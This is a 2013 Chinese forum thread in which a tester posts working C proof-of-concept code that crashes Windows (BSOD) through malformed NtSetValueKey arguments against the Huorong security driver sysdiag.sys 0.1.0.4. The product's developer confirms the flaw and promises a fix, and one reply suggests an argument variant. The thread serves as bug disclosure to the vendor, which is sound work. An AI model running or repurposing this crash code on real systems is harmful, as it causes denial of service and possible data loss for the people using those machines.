【蓝屏了~】《【2.19更新】火绒安全防御软件，欢迎测试～～》

显示全部楼层 · 发表于 2013-2-19 22:26:52

本帖最后由 KiDebug 于 2013-2-19 23:04 编辑

sysdiag.sys 0.1.0.4，数字签名时间：2013年2月19日 16:07:53

/********************************************************************
author: KiDebug
purpose: BSOD
*********************************************************************/
#include <Windows.h>
typedef ULONG (__stdcall *NtSetValueKey_ ) ( HANDLE, ULONG, ULONG, ULONG, ULONG, ULONG );
void main()
{
HMODULE hNtdll = NULL;
HKEY hKey = NULL;
NtSetValueKey_ NtSetValueKey = NULL;
hNtdll = GetModuleHandle( L"ntdll.dll" );
if ( hNtdll == NULL )
{
goto Exit0;
}
NtSetValueKey = (NtSetValueKey_)GetProcAddress( hNtdll, "NtSetValueKey" );
if ( NtSetValueKey == NULL )
{
goto Exit0;
}
if ( RegOpenKeyEx(HKEY_CURRENT_USER,L"EUDC",0,KEY_QUERY_VALUE,&hKey) != ERROR_SUCCESS )
{
goto Exit0;
}
NtSetValueKey( hKey, 1, 0, 0, 0, 0 );
Exit0:
if ( hKey )
{
RegCloseKey(hKey);
}
return;
}

复制代码

附个EXE：

显示全部楼层 · 发表于 2013-2-19 22:29:07

慎用原创``

显示全部楼层 · 发表于 2013-2-19 22:32:57

注册表..
还有好多内核函数...

看不懂....

显示全部楼层 · 发表于 2013-2-19 22:35:02

本帖最后由 vardyh 于 2013-2-19 22:42 编辑

刚查了下代码，确实有问题，我这个没蓝也实属奇葩了

感谢！明天升级解决！

显示全部楼层 · 发表于 2013-2-19 22:43:26

这是技术原创么

显示全部楼层 · 发表于 2013-2-19 22:45:43

vardyh 发表于 2013-2-19 22:35
刚查了下代码，确实有问题，我这个没蓝也实属奇葩了
感谢！明天升级解决！

把 1 改成 0x80000000 看看

显示全部楼层 · 发表于 2013-2-19 23:02:49

楼主改标签吧，毕竟原创不能乱用

显示全部楼层 · 发表于 2013-2-20 00:01:16

额检查参数

[讨论] 【蓝屏了~】《【2.19更新】火绒安全防御软件，欢迎测试～～》